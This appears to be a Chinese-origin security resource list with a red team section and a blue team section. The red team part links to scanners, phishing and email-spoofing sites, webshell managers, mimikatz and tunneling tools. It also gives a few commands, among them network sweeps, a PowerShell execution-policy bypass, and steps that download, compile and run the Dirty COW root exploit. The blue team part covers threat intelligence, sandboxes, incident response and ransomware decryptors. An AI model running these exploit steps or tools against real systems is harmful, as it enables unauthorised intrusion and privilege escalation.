Red Team
Early phase
Information gathering
https://chrome.zzzmh.cn/info?token=gppongmhjkpfnbhagpmjfkannfbllamg Wappalyzer (Chrome website analysis extension)
https://www.whatruns.com/ Web fingerprinting
https://github.com/Ekultek/WhatWaf Firewall identification
https://github.com/r0eXpeR/redteam_vul Red team fingerprints
https://github.com/skskevin/PortScan
https://github.com/shadow1ng/fscan Scanning
https://www.exploit-db.com/ Vulnerability database
https://www.exploit-database.net/ Vulnerability database 2
https://github.com/lz520520/railgun Penetration testing tool
https://github.com/gobysec/Goby Scanning tool (maps the attack surface exposed by assets)
https://github.com/projectdiscovery/ Enterprise external network asset collection
https://github.com/rtcatc/Packer-Fuzzer Scanner for fast, efficient security testing of websites built with front-end bundlers such as Webpack
https://github.com/chaitin/xray Chaitin Xray
https://github.com/maurosoria/dirsearch Dirsearch (directory scanning)
https://github.com/H4ckForJob/dirmap Dirmap (directory scanning)
https://github.com/Tuhinshubhra/CMSeeK CMS identification
http://whatweb.bugscaner.com/look/ Online CMS fingerprinting
https://github.com/shmilylty/OneForAll Subdomain collection tool
https://github.com/lijiejie/subDomainsBrute subDomainsBrute (subdomains)
https://github.com/BugScanTeam/GitHack Git leaks
https://github.com/kost/dvcs-ripper General information leaks
https://github.com/TheKingOfDuck/fuzzDicts fuzzdb
https://github.com/1N3/IntruderPayloads fuzzdb
https://github.com/TheKingOfDuck/easyXssPayload XssPayload
MD5
http://www.xmd5.org/index_cn.htm
Vulnerability detection and attack
https://github.com/SafeGroceryStore/MDUT Database exploitation tool
https://github.com/Macr0phag3/email_hack Phishing email
https://emkei.cz/ Spoofed email
https://github.com/brendan-rius/c-jwt-cracker JWT forgery
https://github.com/feihong-cs/ShiroExploit Shiro deserialization
https://github.com/feihong-cs/ShiroExploit-Deprecated Shiro deserialization 2
https://github.com/dionach/CMSmap CMS vulnerability detection tool
https://github.com/chenjj/CORScanner Scans for CORS configuration vulnerabilities
https://github.com/deathmarine/Luyten/releases/ Luyten decompiler (JAR files)
https://github.com/opensec-cn/vtest VTest - vulnerability testing helper system
https://github.com/meizjm3i/PHPVulFinder Automated static audit tool for PHP code
https://github.com/sveinbjornt/Platypus Platypus - multi-session interactive host management tool
https://dig.pm/ DNSLOG
Later phase
Live host scanning
nbtscan.exe:nbtscan 192.168.1.1/20
arp-scan.exe:arp-scan.exe -t 192.168.1.1/24 https://github.com/QbsuranAlang/arp-scan-windows-
ping: for /L %I in (1,1,254) do @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
Invoke-ARPScan.ps1: powershell.exe -exec bypass -Command "& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}" >> c:\log.txt
PowerShell penetration testing tool - Nishang https://github.com/samratashok/nishang
cping:cping scan smbvul 10.33.93.1 10.33.93.1
qs.exe:qs alive 192.168.1.1/24
dnsbrute
F-NAScan.py https://github.com/ywolf/F-NAScan
fscan:
https://github.com/shadow1ng/fscan
https://github.com/chaosec2021/fscan-POC
Port scanning
s.exe: s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save
scanline: scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b
Invoke-Portscan.ps1: Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [live host probing -ResolveHost]
nmap
Post-exploitation
https://i.hacking8.com/tiquan Privilege escalation identification
https://www.shentoushi.top/av/av.php Antivirus identification
https://github.com/k8gege/Ladon Ladon 7.2
https://github.com/gentilkiwi/mimikatz Password capture
https://www.objectif-securite.ch/en/ophcrack Hash cracking
http://cracker.offensive-security.com/index.php Hash cracking
https://github.com/shack2/SNETCracker Super weak-password checking tool
https://ngrok.com/ Intranet tunneling 1
https://github.com/fatedier/frp Intranet tunneling 2
https://github.com/sensepost/reDuh Intranet tunneling 3
https://github.com/SECFORCE/Tunna Intranet tunneling 4
https://github.com/ehang-io/nps Intranet tunneling 5
https://github.com/esrrhs/spp Intranet tunneling 6
https://github.com/BeichenDream/Godzilla/ Godzilla webshell
https://github.com/rebeyond/Behinder/ Behinder webshell
https://github.com/AntSwordProject/AntSword-Loader/releases/tag/4.0.3 AntSword
https://github.com/FireFart/dirtycow Dirty COW privilege escalation (CVE-2016-5195)
Linux kernel >= 2.6.22: gcc -pthread dirty.c -o dirty -lcrypt, then run the ./dirty <password> command to escalate privileges. /etc/passwd can be backed up before escalating.
https://github.com/dirtycow/dirtycow.github.io Dirty COW privilege escalation 1 (CVE-2016-5195)
https://github.com/gbonacini/CVE-2016-5195 Dirty COW privilege escalation 2 (CVE-2016-5195)
wget https://github.com/gbonacini/CVE-2016-5195/archive/master.zip unzip master cd CVE-2016-5195-master make ./dcow -s
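https://github.com/abatchy17/WindowsExploits Privilege escalation vulnerabilities (2017.5)
https://github.com/QAX-A-Team/BrowserGhost Browser information collection
https://github.com/uknowsec/SharpDecryptPwd Host password collection tool (Windows)
https://github.com/SecureAuthCorp/impacket Impacket is a collection of Python classes for working with network protocols
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD disable_function tool
http://payloads.net/Windows_patch/ Windows privilege escalation helper tool
https://i.hacking8.com/tiquan/ Windows privilege escalation helper tool 2
http://blog.neargle.com/win-powerup-exp-index/ Windows privilege escalation helper tool 3
linux-exploit-suggester.sh Linux privilege escalation helper tool (1)
linux-exploit-suggester-2.pl Linux privilege escalation helper tool (2)
privchecker.py Linux privilege escalation helper tool (3)
LinEnum.sh Linux privilege escalation helper tool (4)
https://github.com/Rvn0xsy/Cooolis-ms Intranet management toolkit
https://bashupload.com/ File upload and sharing
https://transfer.sh/ File upload and sharing
Domain penetration
https://github.com/BloodHoundAD/BloodHound Domain users
https://github.com/SkewwG/domainTools Small domain penetration tools
Blue Team
Threat intelligence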
https://www.virustotal.com/ VirusTotal
https://ti.qianxin.com/ QiAnXin threat intelligence
https://ti.360.cn/ 360 Threat Intelligence Center
https://www.venuseye.com.cn/ Venustech threat intelligence
https://redqueen.tj-un.com REDQUEEN
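https://poma.nsfocus.com/ NSFOCUS threat analysis center
https://habo.qq.com/ Tencent Habo system
https://mac-cloud.riskivy.com FreeBuf × Vulbox "Dasheng Cloud Sandbox"
Online cloud sandboxes
https://ata.360.cn/detection 360 Sandbox Cloud
https://s.threatbook.cn/ ThreatBook cloud sandbox
https://www.virustotal.com/gui/home/upload VirusTotal platform
https://www.maldun.com/submit/submit_file/ Maldun security analysis platform
https://app.any.run/ Any.Run interactive malware analysis platform
Attribution and tracing
https://www.chaipip.com/ High-precision IP address lookup - chaipip
https://www.opengps.cn/Data/IP/ipplus.aspx High-precision IP geolocation
https://www.ipip.net/ip.html ipip reverse lookup
http://ip.yqie.com/ IP address reverse lookup
http://qd.yyimg.com/act/index/id/ Baidu ID reverse lookup
https://www.reg007.com/ Registered-website reverse lookup
Vulnerability intelligence
https://www.secshi.com/circle/qingbao Secshi intelligence sharing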
https://www.seebug.org/ seebug
https://nosec.org/home/index/hole.html nosec
Cyberspace mapping sites
Webshell detection and removal
Incident response tools
Windows
Autoruns
PCHunter
ProcessDump
processhacker
Huorong Sword
https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer Process Explorer
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon Process Monitor
https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec Psexec
https://docs.microsoft.com/zh-cn/sysinternals/downloads/tcpview TCPView
https://docs.microsoft.com/zh-cn/sysinternals/downloads/adexplorer Active Directory Explorer
https://goaccess.io/ Access log analysis
Linux
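https://github.com/grayddq/GScan Linux host investigation
https://github.com/T0xst/linux Linux security check
Ransomware search sites
[360] Ransomware search engine, supports lookup of more than 800 common types of ransomware
[Tencent] Ransomware search engine, supports lookup of more than 300 common types of ransomware
[Venustech] VenusEye ransomware search engine, more than 300 ransomware families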
https://lesuo.venuseye.com.cn/
[QiAnXin] Ransomware search engine
https://lesuobingdu.qianxin.com/
[Sangfor] Ransomware search engine
Ransomware decryption tool collections
[Tencent Habo] Dedicated ransomware removal tool
https://habo.qq.com/tool/index
[Kingsoft Antivirus] Ransomware immunization tool
http://www.duba.net/dbt/wannacry.html
[Huorong] Ransomware decryption tool collection
http://bbs.huorong.cn/thread-65355-1-1.html
[Rising] Decryption tool downloads
http://it.rising.com.cn/fanglesuo/index.html
[nomoreransom] Ransomware decryption tool collection
https://www.nomoreransom.org/zh/index.html
[MalwareHunterTeam] Ransomware decryption tool collection
https://id-ransomware.malwarehunterteam.com/
[Kaspersky] Free ransomware decryptors
https://noransom.kaspersky.com/
[Avast] Free ransomware decryption tools
https://www.avast.com/zh-cn/ransomware-decryption-tools
[Emsisoft] Free ransomware decryption tools
https://www.emsisoft.com/ransomware-decryption-tools/free-download
Dedicated removal tools
https://www.qianxin.com/other/qaxvirusremoval QiAnXin stubborn-virus removal tool
https://bbs.huorong.cn/thread-18575-1-1.html Huorong malicious trojan removal tool